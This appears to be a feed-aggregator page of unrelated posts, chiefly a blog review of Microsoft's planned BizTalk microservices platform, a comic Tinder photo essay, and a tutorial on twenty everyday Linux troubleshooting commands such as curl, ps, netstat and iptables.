          Early in the BizTalk days there was an attempt to involve Business Analysts in the development of Workflows (aka Orchestrations).  This model never really worked well, as Visual Studio was just too developer-focused, and Orchestration Designer for Business Analysts (ODBA) just didn’t have the required functionality for it to be a really good tool.  Microsoft is once again attempting to bring the Business Analyst into the solution by providing a simple-to-use tool which is hosted in a Web browser.  I am always a bit skeptical when companies try to enable these types of BA scenarios, but I think that was primarily driven by workflows being defined in an IDE instead of a web browser.


          Picture Source @wearsy

          Once again, nice to see Microsoft focusing on key tenets that will drive their investment.  Also glad to see some of the traditional integration requirements being addressed including:

          • Persist State
          • Message Assurance
          • End to end tracking
          • Extensibility

          All too often some of these ‘new age’ platforms provide lightweight capabilities but neglect the features that integration developers need to support their business requirements. I don’t think this is the case with BizTalk going forward.


          Picture Source @wearsy

          SaaS Connectivity

          A gap that has existed in the BizTalk Server platform is SaaS connectivity.  While BizTalk does provide a WebHttp Adapter that can both expose and consume RESTful services, I don’t think it is enough (as I discussed in my talk).  I do feel that providing great SaaS connectors, which make developers more productive and reduce the time to deliver projects, is mandatory.  Delivering value quicker is one of the reasons why people buy Integration Platforms, and subsequently having a library that contains full-featured, stable connectors for SaaS platforms is increasingly becoming important.  I relate the concept of BizTalk SaaS connectors to Azure Active Directory Federations.  That platform boasts more than 2000 ‘identity adapters’.  Why should it be any different for integration?

          The following image is a bit busy, but some of the Connector Microservices we can expect include:

          • Traditional Enterprise LOBs
          • Dynamics CRM Online
          • SAP SuccessFactors
          • Workday
          • SalesForce
          • HDInsight
          • Quickbooks
          • Yammer
          • Dynamics AX
          • Azure Mobile Services
          • Office 365
          • Coupa
          • OneDrive
          • SugarCRM
          • Informix
          • MongoDB
          • SQL Azure
          • BOX
          • Azure Blobs and Table
          • ….

          This list is just the beginning.  Check out the Marketplace section in this blog for more announcements.


          Picture Source @wearsy

          Rules Microservice

          Rules (engines) are a component that shouldn’t be overlooked when evaluating Integration Platforms.  I have been at many organizations where ‘the middleware should not contain any business rules’.  While in principle I do agree with this approach, it is not always that easy. What do you do in situations where you are integrating COTS products that don’t allow you to customize?  Or there may be situations where you can customize, but do not want to, as you may lose your customizations in a future upgrade. Enter a Rules platform.

          The BizTalk Server Rules Engine is a stable and good Rules Engine.  It does have some extensibility and can be called from outside BizTalk using .NET.  At times it has been criticized as being a bit heavy and difficult to maintain.  I really like where Microsoft is heading with its Microservice implementation that will expose "Rules as a Service" (RaaS?  - ok I will stop with that). This allows integration interfaces to leverage this Microservice, but also allows other applications such as web or mobile applications to leverage it.  I think there will be endless opportunities for the broader Azure ecosystem to leverage this capability without introducing a lot of infrastructure.


          Picture Source @wearsy

          Once again, Microsoft is enabling non-developers to participate in this platform.  I think a Rules engine is a place where Business Analysts should participate.  I have seen this work on a recent project with Data Quality Services (DQS) and don’t see why this can’t transfer to the Rules Microservice.


          Picture Source @wearsy

           

          Data Transformation

          Another capability that will be exposed as a Microservice is Data Transformation (or mapping).  This is another capability that will exist in a Web browser.  If you look closely at the following image you will discover that we will continue to have what appears to be a functoid (or equivalent).

          Only time will tell if a Web Browser will provide the power to build complex Maps.  One thing that BizTalk Server is good at is dealing with large and complex maps.  The BizTalk mapping tools also provide a lot of extensibility through managed code and XSLT.  We will have to keep an eye on this as it further develops.

          image

           

          Analytics

          Within BizTalk Server we have Business Activity Monitoring (BAM).  It is a very powerful tool but has been accused of being too heavy at times. One of the benefits of leveraging the power of Azure is that we will be able to plug into all of those other investments being made in this area.

          While there were not a lot of specifics related to Analytics, I think it is a pretty safe bet that Microsoft will be able to leverage their Power BI suite, which is making giant waves in the industry.

          One interesting demo they did show us was using Azure to consume SalesForce data and display it in familiar Microsoft BI tools.

          I see a convergence between cloud-based integration, Internet of Things (IoT), Big Data and Predictive Analytics.  Microsoft has some tremendous opportunities in this space, as they have very competent offerings in each of these areas. If Microsoft can find a way to ‘stitch’ them all together, there will be some amazing solutions developed.

          Picture Source @wearsy

          Below is a Power BI screen that displays SalesForce Opportunities by Lead Source.

          Picture Source @wearsy

          Marketplace - Microservice Gallery

          Buckle your seatbelts for this one!

          Azure already has a marketplace appropriately called Azure Marketplace. In this Marketplace you can leverage 3rd party offerings including:

          • Data services
          • Machine Learning
          • Virtual Machines
          • Web applications
          • Azure Active Directory applications
          • Application services

          You can also expect a Microservice Gallery to be added to this list.  This will allow 3rd parties to develop Microservices and add them to the Marketplace.  These Microservices can be monetized in order to develop a healthy ecosystem.  At the beginning of this blog post you saw a list of Microsoft partners who are active in the existing Integration ecosystem.  Going forward you can expect these partners, plus other Azure partners and independent developers, building Microservices and publishing them to this Marketplace.

          In the past there has been some criticism about BizTalk being too .Net specific and not supporting other languages.  Well guess what? Microservices can be built using other languages that are already supported in Azure including:

          • Java
          • Node.js
          • PHP
          • Python
          • Ruby

          This means that if you wanted to build a Microservice that talks to SaaS application ‘XYZ’, you could build it in one of these languages and then publish it to the Azure Marketplace.  This is groundbreaking.

          The image below describes how a developer would go ahead and publish their Microservice to the gallery through a wizard-based experience.

          Picture Source @wearsy

          Another aspect of the gallery is the introduction of templates.  Templates are another artifact that 3rd parties can publish and contribute.  Given the very large Microsoft ISV community and its deep domain expertise, this has the potential to be very big.

          Some of the examples that were discussed include:

          • Dropbox – Office365
          • SurveyMonkey – SalesForce
          • Twitter – SalesForce

          With a vast number of Connector Microservices, the opportunities are endless.  I know a lot of the ISVs in the audience were very excited to hear this news and were discussing which templates they are going to build first.


          Picture Source @nickhauenstein

          What about BizTalk Server?

          Without question, a lot of attendees are still focused on On-Premises integration. This is in part due to some of the conservative domains that these people support. Some people were concerned about their existing investments in BizTalk Server.  Microsoft confirmed (again) their commitment to these customers.  You will not be left behind!  On the flip side, I don’t think you can expect a lot of innovation in the traditional On-Premises product, but you will be supported and new versions will be released, including BizTalk Server 2015.

          You can also expect every BizTalk Server capability to be made available as a Microservice in Azure. Microsoft has also committed to providing a great artifact migration experience that allows customers to transition into this new style of architecture.


          Picture Source @wearsy

          Conclusion

          If there is one thing that I would like you to take away from this post it is the “power of the Azure platform”.  This is not the BizTalk team working in isolation to develop the next generation platform.  This is the BizTalk team working in concert with the larger Azure App Platform team.  It isn’t only the BizTalk team participating but other teams like the API Management team, Mobile Services team, Data team and  many more I am sure.

          In my opinion, the BizTalk team being part of this broader team and working side by side with them, reporting up the same organization chart is what will make this possible and wildly successful.

          Another encouraging theme that I witnessed was the need for a lighter weight platform without compromising Enterprise requirements.  When you look at some of the other platforms that allow you to build interfaces in a web browser, this is what they are often criticized for.  With Microsoft having such a rich history in Integration, they understand these use cases as well as anyone in the industry. 

          Overall, I am extremely encouraged with what I saw.  I love the vision and the strategy.  Execution will become the next big challenge. Since there is a very large Azure App Platform team providing a lot of the foundational platform, I do think the BizTalk team has the bandwidth, talent and vision to bring the Integration specific Microservices to this amazing Azure Platform.

          In terms of next steps, we can expect a public preview of Microservices (including BizTalk) in Q1 of 2015.  Notice how I didn’t say a BizTalk Microservices public preview?  This is not just about BizTalk; this is about a new Microservice platform that includes BizTalk.  As soon as more information is publicly available, you can expect to see updates on this blog.


                    Marmot-style links for the weekend


          Photo comic ODB #2, from ORKUT DE BÊBADO

          The soap opera Cama de Gato: cast, opening credits and trivia, from PUTSGRILO

          Ten things you should never do in a men's restroom, from ELA TÁ DE XICO

          The new mascot of the Rio 2016 Olympics, from SUPER PÉROLAS

          Five indisputable facts about Europeans, from ESTRANHOS EUROPEUS

          Super-crazy Jeremias is nothing compared to this interviewee, from COPIA MEU FILHO
                    InnoDB: implementing multiple data files per single tablespace
          The content of this article is covered by a CC license; it may be freely reproduced, but the original source, author information, and copyright notice URL must be indicated with a hyperlink: ht […]
                    How I Used Tinder Smart Photos to Prove Once and for All That I’m More Attractive Than a Plate of Cold Refried Beans        

          Tinder now has a feature called “smart photos” that uses an algorithm to determine which of your photos is most successful and then automatically shows that photo to potential matches. 2017 has been a rough year for me — I hit the wrong side of 25, I got dumped, and I lost my job. I didn’t think I’d be able to turn this year around, but then I realized something. Maybe I could get some of my confidence back if only I knew once and for all — am I more attractive than a plate of cold refried beans? It was so simple — and Tinder smart photos could help me answer this question.

          To conduct this experiment, I needed a set of test data. Tinder smart photos will look through all your photos and choose the best one. You’ll know which one it’s chosen because that’ll be the first photo you see when you log in. All I wanted to know was this: if I chose my five best photos, would every one of them be more successful than a plate of cold refried beans?

          If I made just one Tinder account with five pictures of me and one plate of cold refried beans, the best one might be a picture of me followed by the cold plate of refried beans followed by four more pictures of me. If this happened, I’d only find out which picture was the best, not the full ranking of pictures. Therefore, to conclude definitively that I’m more attractive than a plate of cold refried beans, I needed to make five separate Tinder accounts. On each account, I’d upload two photos: one of me, and one of a plate of cold refried beans. Of course, for consistency, I used the same picture of a plate of cold refried beans every time. How’d I get this picture, you might ask? I fried beans. Then I fried them again. Then I left them out overnight. Because I’m a goddamn scientist.

          My test pictures were the following:

          • Me from a very high angle to accentuate my best feature, namely my knowledge of which photo angle makes me look skinny.
          • Me doing stand-up comedy to demonstrate my wit and charm but actually just my wit.
          • Me and my sister to show how family-oriented I am and also to trick people into thinking I’m 21.
          • Me in a Safeway parking lot to demonstrate my love for the great outdoors.
          • Me in a bikini because as my mother used to say: “If you don’t have a bikini pic on Tinder, you’re probably less sexy than a plate of cold refried beans.”
          • A plate of cold refried beans.

          I was now ready to begin Tinder-ing. I wanted to make sure the experiment had adequate time to collect data, so I left each account open for a day, logged which picture won, deleted the Tinder account, and then made a new one. For keeping track of data of this magnitude, I’d recommend a SQL server, a MongoDB database, an Excel spreadsheet, or also you could write the results in eyeliner on your inner thigh. I chose the eyeliner route because I wanted to be able to iterate quickly, but please offer feedback if you think I could improve upon the data collection portion of the experiment.

          After the first four days of my experiment, the score was GINNY: 4, PLATE OF COLD REFRIED BEANS: 0. Things were looking good for this girl. I just had to get through one more photo — the dreaded bikini pic. I don’t have an especially great swimsuit bod, perhaps owing to my affinity for eating cold refried beans for dinner. I braced myself for a challenging day ahead as I made a new Tinder account that was just my body and the beans. Around 9pm, I was still too scared to look at the results. Could my self-esteem handle the knowledge that men would rather fuck a fart-inducing shit-like substance than my naked body? I was about to find out. At midnight, I was ready to get the final results. I held my breath as the app loaded. What would it be?! It stalled — damn my slow wifi. And then I saw it — IT WAS MY BIKINI PIC!! I AM MORE BEAUTIFUL THAN A PLATE OF COLD REFRIED BEANS!! WHAT A TIME TO BE ALIVE!!

          I’ve obviously been on Cloud 9 since the conclusion of this experiment. If I were to extend my analysis, I’d want to know if I were sexier than other plates of cold food, such as plates of cold spaghetti or plates of cold broccoli. I’d also want to see how I compared with stuff like grass and pavement. Perhaps one day I might even wonder if I’m more attractive to men now than I was when I was 11. But for now, I’m just happy knowing I’m more attractive than a plate of cold refried beans.


                    Accessing with @getprofilefield from one database to another that contains the profile document

          Accessing with @getprofilefield from one database to another that contains the profile document

          Reply to: Accessing with @getprofilefield from one database to another that contains the profile document

          It is not possible from an @formula, but it is from LotusScript.

          In the form's QueryOpen event:

          Dim oSession As NotesSession
          Dim oDb As NotesDatabase
          Dim oProfile As NotesDocument

          Set oSession = New NotesSession
          Set oDb = oSession.getDatabase(.......)        ' server and file name of the other database
          Set oProfile = oDb.getProfileDocument(......)  ' name of the profile form/document

          Call Source.FieldSetText( ..... , oProfile.getItemValue(.....)(0) )  ' target field, profile item name


          Something like that.

          Published on April 7, 2016 by ElLobo

                    Comment on Why MongoDB Will Crush in 2015 by MongoDB Welcomes New CMO - Diamond        
          […] two MongoDB updates in that time: 2.8 and 3.0. I wrote an article back in January entitled Why MongoDB Will Crush in 2015, describing the recent shifts happening as far as leadership at MongoDB, and the recent funding […]
                    20 Linux Commands Every System Administrator Should Know

          In an environment where brand-new tools and diverse development setups keep multiplying, every developer and engineer needs to learn some basic system administration commands. Specific commands and tool packages can help developers organize, troubleshoot, and optimize their applications, and when errors occur they also give operations staff and system administrators valuable triage information.

          Whether you are a new developer or want to manage your own applications, the following 20 basic system administration commands can help you better understand your applications. They can also help you work out why an application runs fine locally but not on a remote host. These commands apply to Linux development environments, containers, and virtual machines.

          1. curl

          curl transfers a URL. Use this command to test an application's endpoint or its connectivity to an upstream service endpoint. curl can also be used to check whether your application can reach other services, such as a database, or to check that your service is healthy.

          For example, suppose your application throws an HTTP 500 error indicating it cannot reach the MongoDB database:

          $ curl -I -s myapplication:5000
          
          HTTP/1.0 500 INTERNAL SERVER ERROR

          The -I option shows only the header information, and the -s option enables silent mode, suppressing errors and progress output. Check whether the database endpoint is correct:

          $ curl -I -s database:27017
          
          HTTP/1.0 200 OK

          So what could the problem be? Check whether your application can reach anything other than the database:

          $ curl -I -s https://opensource.com
          
          HTTP/1.1 200 OK

          That looks fine, so now try to reach the database. Your application is using the database's hostname, so try that first:

          $ curl database:27017
          
          curl: (6) Couldn't resolve host 'database'

          This means your application cannot resolve the database, either because the database URL is unavailable or because the host (container or VM) has no name server it can use to resolve the hostname.

          2. python -m json.tool / jq

          After using curl, the output of an API call can be hard to read. Sometimes you want to pretty-print the returned JSON to find a specific entry. Python has a built-in library that helps with this: use python -m json.tool to indent and organize the JSON. To use Python's JSON module, pipe the JSON output into the python -m json.tool command.

          $ cat test.json
          {"title":"Person","type":"object","properties":{"firstName":{"type":"string"},"lastName":{"type":"string"},"age":{"description":"Age in years","type":"integer","minimum":0}},"required":["firstName","lastName"]}

          To use the Python library, pipe the output into it with the -m (module) option.

          $ cat test.json | python -m json.tool
          {
              "properties": {
                  "age": {
                      "description": "Age in years",
                      "minimum": 0,
                      "type": "integer"
                  },
                  "firstName": {
                      "type": "string"
                  },
                  "lastName": {
                      "type": "string"
                  }
              },
              "required": [
                  "firstName",
                  "lastName"
              ],
              "title": "Person",
              "type": "object"
          }

          For more advanced JSON parsing, you can install jq. jq provides options for extracting specific values from JSON input. To pretty-print JSON like the Python module above, simply apply jq to the output.

          $ cat test.json | jq
          {
            "title": "Person",
            "type": "object",
            "properties": {
              "firstName": {
                "type": "string"
              },
              "lastName": {
                "type": "string"
              },
              "age": {
                "description": "Age in years",
                "type": "integer",
                "minimum": 0
              }
            },
            "required": [
              "firstName",
              "lastName"
            ]
          }
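
          For instance, to pull a single value out of the document shown above:

          $ cat test.json | jq '.properties.age.type'
          "integer"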

          3. ls

          ls lists the files in a directory; system administrators and developers use it all the time. In the container space, it can help you inspect the directories and files inside a container image. Besides locating files, ls can also be used to check permissions. In the example below, you cannot run myapp because of a permissions problem. When you check the permissions with ls -l, you see there is no "x" in -rw-r--r--, so the file is only readable and writable, not executable.

          $ ./myapp
          bash: ./myapp: Permission denied
          $ ls -l myapp
          -rw-r--r--. 1 root root 33 Jul 21 18:36 myapp

          4. tail

          tail displays the last part of a file. Usually you do not need to read every line of a log to troubleshoot; instead, you want to see what the log says about the most recent requests to your application. For example, when you make requests to an Apache HTTP server, use tail to check what shows up in the log.

          Use tail -f to follow a log file and watch entries as requests come in.
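
          For example, to follow the Apache access log (the same log file used below) as requests arrive:

          $ tail -f /var/log/httpd/access_log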

          The -f option means "follow": it prints log lines as they are written to the file. The example has a background script hitting the endpoint every few seconds, and the log records each request. Besides following the log in real time, you can also use tail with the -n option to view, for instance, the last 100 lines of a file.

          $ tail -n 100 /var/log/httpd/access_log

          5. cat

          cat is mainly used to view file contents and concatenate files. You might use cat to inspect a dependency file or to confirm the version of an application you have built locally.

          $ cat requirements.txt
          flask
          flask_pymongo

          The example above checks whether your Python Flask application lists Flask as a dependency.

          6. grep

          grep searches text using pattern matching, including regular expressions. If you are looking for a specific pattern in the output of another command, grep highlights the relevant lines. Use it to search log files, look for particular processes, and so on. If you want to see whether Apache Tomcat has started, the sheer volume of output can be overwhelming, but piping that output into grep isolates the lines that show the server is up.

          $ cat tomcat.log | grep org.apache.catalina.startup.Catalina.start
          01-Jul-2017 18:03:47.542 INFO [main] org.apache.catalina.startup.Catalina.start Server startup in 681 ms

          7. ps

          ps shows status information about processes. Use it to determine which applications are running or to confirm an expected process is present. For example, to check on a running Tomcat web server, use ps with options to get Tomcat's process ID.

          $ ps -ef
          UID        PID  PPID  C STIME TTY          TIME CMD
          root         1     0  2 18:55 ?        00:00:02 /docker-java-home/jre/bi
          root        59     0  0 18:55 pts/0    00:00:00 /bin/sh
          root        75    59  0 18:57 pts/0    00:00:00 ps -ef

          For better readability, pipe ps into grep.

          $ ps -ef | grep tomcat
          root         1     0  1 18:55 ?        00:00:02 /docker-java-home/jre/bi

          8. env

          env lists all the environment variables and their values (it can also set them). During troubleshooting you may need to check whether a wrong environment variable is preventing your application from starting. In the example below, the command is used to inspect the environment variables set on the application's host.

          $ env
          PYTHON_PIP_VERSION=9.0.1
          HOME=/root
          DB_NAME=test
          PATH=/usr/local/bin:/usr/local/sbin
          LANG=C.UTF-8
          PYTHON_VERSION=3.4.6
          PWD=/
          DB_URI=mongodb://database:27017/test

          Note that the application is using Python 3 and has environment variables for connecting to a MongoDB database.

          9. top

          top displays information about the processes on the system and their resource usage, similar to the Windows Task Manager. Use it to determine which processes are running and how much memory and CPU they consume. A common scenario: you run an application and it dies after a minute. You first check the error the application returned and find it is a memory error.

          $ tail myapp.log
          Traceback (most recent call last):
          MemoryError

          Is your application really out of memory? To confirm, use top to see how much CPU and memory it consumes. After running top, you notice a Python application using most of the CPU, with its memory usage climbing quickly. While it is running, press the "C" key to see the full command and work out which process it is. It turns out to be your memory-intensive application (memeater.py). When your application runs out of memory, the system kills it with an out-of-memory (OOM) error.

          The application's memory and CPU usage increase until it is killed for running out of memory.

          Pressing "C" reveals the full command that started the application.

          Besides checking your own application, you can use top to debug other processes that consume CPU or memory.
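
          If you already know which process you care about, you can also point top at it directly; for example, for the memeater.py process above (the PID shown here is illustrative):

          $ pgrep -f memeater.py
          1234
          $ top -p 1234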

          10. netstat

          netstat shows network status information. It displays the network ports in use and their incoming connections. However, netstat does not come out of the box on every Linux distribution; if you need to install it, it is found in the net-tools package. As a developer experimenting locally or pushing an application to a host, you may get an error that a port is already allocated or an address is already in use. netstat reveals the protocol, the process, and the port; here it shows that the Apache HTTP server is already using port 80 on this host.

          Using netstat -tulpn shows that Apache is already using port 80 on this machine.
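
          As a rough illustration of what that looks like (column layout and values vary by distribution; the httpd entry is the assumed Apache process):

          $ netstat -tulpn
          Active Internet connections (only servers)
          Proto Recv-Q Send-Q Local Address     Foreign Address   State    PID/Program name
          tcp        0      0 0.0.0.0:80        0.0.0.0:*         LISTEN   1/httpd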

          11. ip address

          If ip address is not available on your host, install it from the iproute2 package. ip address shows the interfaces and IP addresses of your application's host. Use it to verify the IP address of your container or host. For example, when your container is attached to two networks, ip address shows which interface is connected to which network. For a quick check, you can always use ip address to get the host's IP address. The example below shows that the web-tier container's IP address on interface eth0 is 172.17.0.2.

          Using ip address shows that the eth0 interface has the IP address 172.17.0.2.
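
          A sketch of that check, using the interface and address mentioned above (the other values are illustrative):

          $ ip address show eth0
          2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 state UP
              link/ether 02:42:ac:11:00:02 brd ff:ff:ff:ff:ff:ff
              inet 172.17.0.2/16 scope global eth0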

          12. lsof

          lsof lists the files currently open on the system ("list open files"). On some Linux systems you may need to install it from the lsof package. In Linux, almost every interaction with the system is treated as a file, so if your application writes to a file or opens a network connection, lsof maps that interaction to a file. Like netstat, lsof can be used to check listening ports. For example, to check whether port 80 is in use, use lsof to see which process is using it. In the example below, you can see httpd (Apache) listening on port 80. You can also use lsof to check httpd's process ID and locate the web server binary (/usr/sbin/httpd).

          lsof shows httpd listening on port 80; inspecting the httpd process ID also reveals all the files httpd needs in order to run.

          The names of the open files in the list help determine where the process comes from, in this case Apache.
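
          An illustrative check of port 80 with lsof (values other than the httpd name are made up for the example):

          $ lsof -i :80
          COMMAND PID USER   FD   TYPE DEVICE SIZE/OFF NODE NAME
          httpd     1 root    4u  IPv6  42976      0t0  TCP *:http (LISTEN)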

          13. df

          Use df to display free disk space when troubleshooting disk-space problems. When you run an application on a container manager, you may get an error message saying the container host is out of available space. Although disk space should be managed and optimized by a system administration layer, you can still use df to find out how much space is available in a directory and confirm whether you have actually run out.

          df shows each filesystem, its absolute size, and the space available.

          The -h option prints the information in a human-readable form; the example above shows this host has plenty of disk space.
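
          An illustrative run (the filesystems and sizes here are made up; yours will differ):

          $ df -h
          Filesystem      Size  Used Avail Use% Mounted on
          /dev/vda1        40G  8.0G   32G  20% /
          tmpfs           2.0G     0  2.0G   0% /dev/shm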

          14. du

          du also reports space usage, but unlike df it reports the disk space used by individual files and directories. To get more detail about which files use disk space within a directory, use du. For example, to find out which log file takes up the most space under /var/log, use du with the -h (human-readable) option and the -s option to get the total size of each entry.

          $ du -sh /var/log/*
          1.8M  /var/log/anaconda
          384K  /var/log/audit
          4.0K  /var/log/boot.log
          0 /var/log/chrony
          4.0K  /var/log/cron
          4.0K  /var/log/maillog
          64K /var/log/messages

          The example above shows which directories under /var/log use the most space (here /var/log/anaconda, at 1.8M). Combine du with df to determine what is using the disk space on your application's host.

          15. id

          To check which user is running the application, use the id command to return the user identity. id shows the real and effective user ID (UID) and group ID (GID). The example below uses Vagrant to test the application in an isolated development environment. After logging into the Vagrant box, if you try to install the Apache HTTP Server (a dependency), the system tells you that you need to be root to run the command. Checking your user and group IDs with id shows that you are running as the "vagrant" user in the "vagrant" group.

          $ yum -y install httpd
          Loaded plugins: fastestmirror
          You need to be root to perform this command.
          $ id
          uid=1000(vagrant) gid=1000(vagrant) groups=1000(vagrant) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

          To resolve this, you must run the command as the superuser, which provides elevated privileges.

          16. chmod

          chmod changes the permissions of a file or directory. The first time you run your application's binary on a host, you may get a "Permission denied" error. As shown in the ls example, you can check the permissions of the application binary.

          $ ls -l
          total 4
          -rw-rw-r--. 1 vagrant vagrant 34 Jul 11 02:17 test.sh

          This shows that you do not have execute permission (no "x") on the binary. chmod can modify the permissions so that your user can run it.

          $ chmod +x test.sh
          [vagrant@localhost ~]$ ls -l
          total 4
          -rwxrwxr-x. 1 vagrant vagrant 34 Jul 11 02:17 test.sh

          As the example shows, this updates the permissions and makes the file executable. Now when you try to run the binary, the application no longer throws a permission-denied error. chmod can also be useful when loading a binary into a container, ensuring the container has the right permissions to execute it.

          17. dig / nslookup

          dig is a common DNS lookup tool and can be used to test whether name resolution is working. A domain name server (DNS) helps resolve a URL to a set of application servers. Sometimes, however, a URL cannot be resolved, which causes connection problems for your application. For example, suppose you try to reach your database from your application's host and get a "cannot resolve" error. To troubleshoot, you use dig (a DNS lookup utility) or nslookup (which queries Internet name servers) to figure out why the application apparently cannot resolve the database.

          $ nslookup mydatabase
          Server:   10.0.2.3
          Address:  10.0.2.3#53
          
          ** server can't find mydatabase: NXDOMAIN

          nslookup shows that mydatabase cannot be resolved. Trying dig gives the same result.

          $ dig mydatabase
          
          ; <<>> DiG 9.9.4-RedHat-9.9.4-50.el7_3.1 <<>> mydatabase
          ;; global options: +cmd
          ;; connection timed out; no servers could be reached

          These errors can be caused by many different problems. If you cannot debug the root cause, contact your system administrator for further investigation. For local testing, such problems may mean that your host's name servers are not configured correctly. To use these commands, you need to install the BIND Utilities package.

          18. iptables

          iptables blocks or allows traffic on a Linux host and manages IP packet filtering, much like a network firewall. This tool can prevent certain applications from receiving or sending requests. More specifically, if your application has trouble reaching another endpoint, iptables may be rejecting traffic to that endpoint. For example, suppose your application's host cannot reach Opensource.com, and you test the connection with curl.

          $ curl -vvv opensource.com
          * About to connect() to opensource.com port 80 (#0)
          *   Trying 54.204.39.132...
          * Connection timed out
          * Failed connect to opensource.com:80; Connection timed out
          * Closing connection 0
          curl: (7) Failed connect to opensource.com:80; Connection timed out

          The connection times out. You suspect something is blocking the traffic, so you show the iptables rules with the -S option.

          $ iptables -S
          -P INPUT DROP
          -P FORWARD DROP
          -P OUTPUT DROP
          -A INPUT -p tcp -m tcp --dport 22 -j ACCEPT
          -A INPUT -i eth0 -p udp -m udp --sport 53 -j ACCEPT
          -A OUTPUT -p tcp -m tcp --sport 22 -j ACCEPT
          -A OUTPUT -o eth0 -p udp -m udp --dport 53 -j ACCEPT

          The first three rules show that traffic is dropped by default. The remaining rules allow SSH and DNS traffic. In this situation, if you need a rule that allows traffic to an external endpoint, follow up with your sysadmin. If this is a host used for local development or testing, you can use iptables to allow the appropriate traffic. Be careful when adding rules that allow traffic to the host.

          19. sestatus

          SELinux (a Linux security module) is commonly used on enterprise-managed application hosts. SELinux gives the processes running on a host least-privilege access, preventing potentially malicious processes from reaching important files on the system. In some situations an application needs access to specific files and errors occur. To check whether SELinux is blocking the application, use tail and grep to look for "denied" messages in the /var/log/audit logs. Otherwise, use sestatus to check whether SELinux is enabled.

          $ sestatus
          SELinux status:                 enabled
          SELinuxfs mount:                /sys/fs/selinux
          SELinux root directory:         /etc/selinux
          Loaded policy name:             targeted
          Current mode:                   enforcing
          Mode from config file:          enforcing
          Policy MLS status:              enabled
          Policy deny_unknown status:     allowed
          Max kernel policy version:      28

          The output above shows that SELinux is enabled on the application's host. In a local development environment, you can adjust SELinux to be more permissive.
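
          To look for the "denied" messages mentioned above, something along these lines works, assuming the usual audit log location:

          $ grep "denied" /var/log/audit/audit.log | tail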

          20. history

          When you run lots of commands while testing and debugging, it is easy to forget a useful one. Every shell has some variant of the history command, which shows the commands used since the session started. You can use history to keep a record of the commands you used to troubleshoot your application. The history command can also display a given number of past commands, read entries from the history file into the history buffer, and write the buffer back out to the history file.

          $ history
              1  clear
              2  df -h
              3  du

          What if you want to run a command from your history without retyping it? Use the ! symbol followed by the command's number. For example, to re-run the second command in the history, type !2.

          Prefixing the number of the command you want to repeat with ! re-executes it.
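
          Continuing the history listing above, where entry 2 was df -h, re-running it looks like this:

          $ !2
          df -h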

          These basic commands sharpen your troubleshooting skills and help you work out why an application runs in one development environment but not another. Many system administrators use them to debug system problems. Knowing a few useful troubleshooting commands goes a long way toward solving application issues.

          Source: https://opensource.com

           


                    The Story of Dynochemy        
          As I wrote previously about “DynamoDB and Me”, I’ve been using Amazon’s hosted NoSQL datastore for some new projects including Lensmob.com. I like it, but it inevitably led me to writing a library for better higher-level usage: Dynochemy. The following is a story of the evolution of this library. How it started as a simple [...]
                    DynamoDB and Me        
          I first became interested in Amazon’s hosted NoSQL datastore, DynamoDB, after reading about Datomic. It’s interesting to consider using this hardened underlying datastore for the simplest possible operations and putting higher-level (and perhaps more dangerous complexity) in the application layer. Also, I’m a big fan of async io and writing web applications in Tornado. This is [...]
                    Injuries of the Face and Teeth (Poškodbe obraza in zob)

          The face is the only part of the body that is practically always uncovered, and because of its functions (sight, hearing, digestion, breathing) it is always at the center of events. It is therefore understandable that injuries to the soft and hard tissues of the face and oral cavity are a common occurrence. When treating injuries to the soft tissues of the face and oral cavity, i.e. the skin, mucous membranes and deeper [...]

          The post Poškodbe obraza in zob appeared first on Zdravstvena.info.


                    Enterprise-Grade Blog System Built on the Spring Boot Stack: Course Released

          I received notice from imooc.com that the video course I designed, "Enterprise-Grade Blog System Built on the Spring Boot Stack", was released at noon on July 31, 2017. Course address: http://coding.imooc.com/class/125.html. From planning and coding to recording and post-production, the course took roughly 4-5 months. Every line of code in the course was typed by me personally; writing the code alone took about a month. I ran into many technical problems and pitfalls along the way, and only I know how painful that was.

          Course overview

          Through this hands-on course, students work around the Spring Boot stack, integrating multiple technologies into a framework suitable for rapid development, building each feature of a blog system step by step, and completing a full front-end plus back-end enterprise Java application.

          Spring Boot is currently a hot Java application framework, and demand for it is strong. Although there is plenty of material introducing Spring Boot, hands-on treatments are scarce, especially ones that build a complete enterprise application around the Spring Boot stack; this course offers the instructor's own take on that. The course centers on integrating a Spring Boot-based stack to design and implement a complete enterprise blog system that supports the features commonly found in blog platforms. By following the construction of this blog system from start to finish, students learn how to design and implement an enterprise-grade Java application. The blog system is a WordPress-like, blog-focused platform that supports multiple users. The technologies involved include Spring Boot, Spring, Spring MVC, Spring Security, Spring Data, Hibernate, Gradle, Bootstrap, jQuery, HTML5, JavaScript, CSS, Thymeleaf, MySQL, H2, Elasticsearch, MongoDB, and more. The course not only walks through the complete enterprise development process, but also combines hands-on practice with focused explanations of each technology, so students understand both the what and the why. The chosen technologies are mainstream and somewhat forward-looking, which helps strengthen students' competitiveness in the job market.

          The course is taught progressively: the first half covers introductory and intermediate hands-on material, and the second half covers advanced hands-on material.

          Who this course is for

          The course is aimed primarily at Java developers and anyone interested in Spring Boot and enterprise development. Since the core of Spring Boot is still Spring, students should have some understanding of Spring before taking the course. The course touches on the front end, the back end, data storage, and big-data processing, so it broadens students' knowledge and teaches the complete process of building an enterprise application.

          What are the highlights and selling points?

          Although the case study is a blog system, the technologies involved are not limited to any one domain; they apply broadly to enterprise applications in both traditional IT and internet companies, and studying the course helps level up your skills. There are few comparable courses on the market, and those that exist rarely combine this many technologies with the same hands-on focus on architecting a real system for a real application.

          Which technologies are covered?

          The technologies involved include Spring Boot, Spring, Spring MVC, Spring Security, Spring Data, Hibernate, Gradle, Bootstrap, jQuery, HTML5, JavaScript, CSS, Thymeleaf, MySQL, H2, Elasticsearch, MongoDB, and more. In my experience, Spring, Spring MVC, jQuery, HTML5, JavaScript, CSS, and MySQL have long histories and plenty of learning material. Beyond focusing on the technologies that are less commonly covered, such as Spring Boot, Gradle, Bootstrap, Thymeleaf, H2, Elasticsearch, and MongoDB, the course also shows how to integrate all of these technologies, build the system framework, and construct a complete enterprise application, which is very different from the "Hello world"-level examples you get when each technology is taught in isolation.

          The technologies selected for the course are popular, in demand, and forward-looking.

          Course structure and teaching approach

